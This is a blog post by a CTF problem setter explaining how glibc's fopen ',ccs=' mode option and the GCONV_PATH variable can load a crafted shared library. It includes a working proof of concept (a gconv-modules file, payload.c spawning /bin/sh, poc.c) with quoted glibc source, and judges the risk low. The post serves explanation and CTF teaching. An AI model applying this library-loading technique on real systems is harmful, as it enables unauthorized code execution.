Getting Arbitrary Code Execution from fopen's 2nd Argument

Published:

Introduction

Recently I was in charge of setting problems of CODE BLUE CTF 2019 Finals.
One of my problems, Wire Hetimarl was “weird” in the sense that you had to give an eye to the 2nd argument of fopen (that is, a mode like rb) for the perfect solution.
How can that argument, which is seemingly and almost always useless for exploitation, be a trigger point?
Here, let me show you an example.

First, let’s put the following two files under /home/user :

gconv-modules
1
2
module  PAYLOAD//    INTERNAL    ../../../../../../../../home/user/payload    2
module INTERNAL PAYLOAD// ../../../../../../../../home/user/payload 2
payload.c
1
2
3
4
5
6
7
8
9
10
#include <stdio.h>
#include <stdlib.h>

void gconv() {}

void gconv_init() {
puts("pwned");
system("/bin/sh");
exit(0);
}

Compile payload.c with gcc payload.c -o payload.so -shared -fPIC.

Then, put the below code in the same directory

poc.c
1
2
3
4
5
6
7
#include <stdio.h>
#include <stdlib.h>

int main(void) {
putenv("GCONV_PATH=.");
FILE *fp = fopen("some_random_file", "w,ccs=payload");
}

and compile and run it. Then…

1
2
3
4
user:/home/user$ gcc poc.c -o poc
user:/home/user$ ./poc
pwned
$

A shell pops out!

What happened?

As you may notice, GCONV_PATH and ,ccs=payload are to blame for this incident.
What are they in the first place?
I guess most of you never saw them before.

According to the man page, glibc’s fopen has several extended features:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
Glibc notes
The GNU C library allows the following extensions for the string
specified in mode:

c (since glibc 2.3.3)
Do not make the open operation, or subsequent read and write
operations, thread cancellation points. This flag is ignored
for fdopen().

e (since glibc 2.7)
Open the file with the O_CLOEXEC flag. See open(2) for more
information. This flag is ignored for fdopen().

m (since glibc 2.3)
Attempt to access the file using mmap(2), rather than I/O
system calls (read(2), write(2)). Currently, use of mmap(2)
is attempted only for a file opened for reading.

x Open the file exclusively (like the O_EXCL flag of open(2)).
If the file already exists, fopen() fails, and sets errno to
EEXIST. This flag is ignored for fdopen().

In addition to the above characters, fopen() and freopen() support
the following syntax in mode:

,ccs=string

The given string is taken as the name of a coded character set and
the stream is marked as wide-oriented. Thereafter, internal
conversion functions convert I/O to and from the character set
string. If the ,ccs=string syntax is not specified, then the wide-
orientation of the stream is determined by the first file operation.
If that operation is a wide-character operation, the stream is marked
wide-oriented, and functions to convert to the coded character set
are loaded.

Uh-huh? So what I have done with ,ccs=payload was just specify the coded character set for the file.
But how did it go so far as to pop a shell?
This time I’m gonna quote glibc’s source code:

libio/fileops.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
FILE *
_IO_new_file_fopen (FILE *fp, const char *filename, const char *mode,
int is32not64)
{
int oflags = 0, omode;
int read_write;
int oprot = 0666;
int i;
FILE *result;
const char *cs;
const char *last_recognized;

...

result = _IO_file_open (fp, filename, omode|oflags, oprot, read_write,
is32not64);

if (result != NULL)
{
/* Test whether the mode string specifies the conversion. */
cs = strstr (last_recognized + 1, ",ccs=");
if (cs != NULL)
{
/* Yep. Load the appropriate conversions and set the orientation
to wide. */
struct gconv_fcts fcts;
struct _IO_codecvt *cc;
char *endp = __strchrnul (cs + 5, ',');
char *ccs = malloc (endp - (cs + 5) + 3);

if (ccs == NULL)
{
int malloc_err = errno; /* Whatever malloc failed with. */
(void) _IO_file_close_it (fp);
__set_errno (malloc_err);
return NULL;
}

*((char *) __mempcpy (ccs, cs + 5, endp - (cs + 5))) = '\0';
strip (ccs, ccs);

if (__wcsmbs_named_conv (&fcts, ccs[2] == '\0'
? upstr (ccs, cs + 5) : ccs) != 0)
{
/* Something went wrong, we cannot load the conversion modules.
This means we cannot proceed since the user explicitly asked
for these. */
(void) _IO_file_close_it (fp);
free (ccs);
__set_errno (EINVAL);
return NULL;
}

Seems __wcsmbs_named_conv plays a role.

wcsmbs/wcsmbsload.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
/* Get converters for named charset.  */
int
__wcsmbs_named_conv (struct gconv_fcts *copy, const char *name)
{
copy->towc = __wcsmbs_getfct ("INTERNAL", name, &copy->towc_nsteps);
if (copy->towc == NULL)
return 1;

copy->tomb = __wcsmbs_getfct (name, "INTERNAL", &copy->tomb_nsteps);
if (copy->tomb == NULL)
{
__gconv_close_transform (copy->towc, copy->towc_nsteps);
return 1;
}

return 0;
}

attribute_hidden
struct __gconv_step *
__wcsmbs_getfct (const char *to, const char *from, size_t *nstepsp)
{
size_t nsteps;
struct __gconv_step *result;

if (__gconv_find_transform (to, from, &result, &nsteps, 0) != __GCONV_OK)
/* Loading the conversion step is not possible. */
return NULL;

/* Maybe it is someday necessary to allow more than one step.
Currently this is not the case since the conversions handled here
are from and to INTERNAL and there always is a converted for
that. It the directly following code is enabled the libio
functions will have to allocate appropriate __gconv_step_data
elements instead of only one. */
if (nsteps > 1)
{
/* We cannot handle this case. */
__gconv_close_transform (result, nsteps);
result = NULL;
}
else
*nstepsp = nsteps;

return result;
}
iconv/gconv_db.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
int
__gconv_find_transform (const char *toset, const char *fromset,
struct __gconv_step **handle, size_t *nsteps,
int flags)
{
const char *fromset_expand;
const char *toset_expand;
int result;

/* Ensure that the configuration data is read. */
__gconv_load_conf ();

...

/* See whether the names are aliases. */
fromset_expand = do_lookup_alias (fromset);
toset_expand = do_lookup_alias (toset);

...

result = find_derivation (toset, toset_expand, fromset, fromset_expand,
handle, nsteps);

/* Release the lock. */
__libc_lock_unlock (__gconv_lock);

/* The following code is necessary since `find_derivation' will return
GCONV_OK even when no derivation was found but the same request
was processed before. I.e., negative results will also be cached. */
return (result == __GCONV_OK
? (*handle == NULL ? __GCONV_NOCONV : __GCONV_OK)
: result);
}

/* The main function: find a possible derivation from the `fromset' (either
the given name or the alias) to the `toset' (again with alias). */
static int
find_derivation (const char *toset, const char *toset_expand,
const char *fromset, const char *fromset_expand,
struct __gconv_step **handle, size_t *nsteps)
{
struct derivation_step *first, *current, **lastp, *solution = NULL;
int best_cost_hi = INT_MAX;
int best_cost_lo = INT_MAX;
int result;

...

/* The task is to find a sequence of transformations, backed by the
existing modules - whether builtin or dynamically loadable -,
starting at `fromset' (or `fromset_expand') and ending at `toset'
(or `toset_expand'), and with minimal cost.

For computer scientists, this is a shortest path search in the
graph where the nodes are all possible charsets and the edges are
the transformations listed in __gconv_modules_db.

For now we use a simple algorithm with quadratic runtime behaviour.
A breadth-first search, starting at `fromset' and `fromset_expand'.
The list starting at `first' contains all nodes that have been
visited up to now, in the order in which they have been visited --
excluding the goal nodes `toset' and `toset_expand' which get
managed in the list starting at `solution'.
`current' walks through the list starting at `first' and looks
which nodes are reachable from the current node, adding them to
the end of the list [`first' or `solution' respectively] (if
they are visited the first time) or updating them in place (if
they have have already been visited).
In each node of either list, cost_lo and cost_hi contain the
minimum cost over any paths found up to now, starting at `fromset'
or `fromset_expand', ending at that node. best_cost_lo and
best_cost_hi represent the minimum over the elements of the
`solution' list. */
...

Did you grasp the situation? So, when we give a coded character set, glibc manages to provide the way of translation between the given set and the internally used set (sometimes it attempts a breadth-first search actually! pretty interesting).

In a nutshell, GCONV_PATH is an environment variable for changing the configuration of this translation mechanism:

iconv/gconv_conf.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
static void
__gconv_read_conf (void)
{
void *modules = NULL;
size_t nmodules = 0;
int save_errno = errno;
size_t cnt;

/* First see whether we should use the cache. */
if (__gconv_load_cache () == 0)
{
/* Yes, we are done. */
__set_errno (save_errno);
return;
}
...
iconv/gconv_cache.c
1
2
3
4
5
6
7
8
9
10
11
12
13
int
__gconv_load_cache (void)
{
int fd;
struct stat64 st;
struct gconvcache_header *header;

/* We cannot use the cache if the GCONV_PATH environment variable is
set. */
__gconv_path_envvar = getenv ("GCONV_PATH");
if (__gconv_path_envvar != NULL)
return -1;
...

That means, if we can set GCONV_PATH as an arbitrary value, then we can forge an arbitrary path of converting coded character sets.
But how does this matter? To answer this, we need to look into find_derivation deeper.

iconv/gconv_db.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
/* The main function: find a possible derivation from the `fromset' (either
the given name or the alias) to the `toset' (again with alias). */
static int
find_derivation (const char *toset, const char *toset_expand,
const char *fromset, const char *fromset_expand,
struct __gconv_step **handle, size_t *nsteps)
{
...

if (solution != NULL)
{
/* We really found a way to do the transformation. */

/* Choose the best solution. This is easy because we know that
the solution list has at most length 2 (one for every possible
goal node). */
if (solution->next != NULL)
{
struct derivation_step *solution2 = solution->next;

if (solution2->cost_hi < solution->cost_hi
|| (solution2->cost_hi == solution->cost_hi
&& solution2->cost_lo < solution->cost_lo))
solution = solution2;
}

/* Now build a data structure describing the transformation steps. */
result = gen_steps (solution, toset_expand ?: toset,
fromset_expand ?: fromset, handle, nsteps);
}
...

static int
gen_steps (struct derivation_step *best, const char *toset,
const char *fromset, struct __gconv_step **handle, size_t *nsteps)
{
...
#ifndef STATIC_GCONV
if (current->code->module_name[0] == '/')
{
/* Load the module, return handle for it. */
struct __gconv_loaded_object *shlib_handle =
__gconv_find_shlib (current->code->module_name);

if (shlib_handle == NULL)
{
failed = 1;
break;
}
...
iconv/gconv_dl.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

/* Open the gconv database if necessary. A non-negative return value
means success. */
struct __gconv_loaded_object *
__gconv_find_shlib (const char *name)
{
...
/* Try to load the shared object if the usage count is 0. This
implies that if the shared object is not loadable, the handle is
NULL and the usage count > 0. */
if (found != NULL)
{
if (found->counter < -TRIES_BEFORE_UNLOAD)
{
assert (found->handle == NULL);
found->handle = __libc_dlopen (found->name);
if (found->handle != NULL)
{
found->fct = __libc_dlsym (found->handle, "gconv");
if (found->fct == NULL)
{
/* Argh, no conversion function. There is something
wrong here. */
__gconv_release_shlib (found);
found = NULL;
}
else
{
found->init_fct = __libc_dlsym (found->handle, "gconv_init");
found->end_fct = __libc_dlsym (found->handle, "gconv_end");
...

Oh, there we can see __libc_dlopen and __libc_dlsym !
Finally we figured out that glibc heavily employs dynamic libraries in order to realize the translation of encodings, and my PoC took advantage of this mechanism.

Is this dangerous?

Not at all I guess. There are two reasons:

  1. There is virtually no situation where attackers can take control of the 2nd argument of fopen. It should be a constant almost always.

  2. GCONV_PATH is considered as a “dangerous” environment variable like LD_PRELOAD. Actually glibc drops it off for setuid binaries(see sysdeps/generic/unsecvars.h).

But nevertheless it is possible to abuse this mechanism perhaps, in the operations related to iconv, not with fopen. I don’t know.
I set this problem just because it was interesting.
Thanks.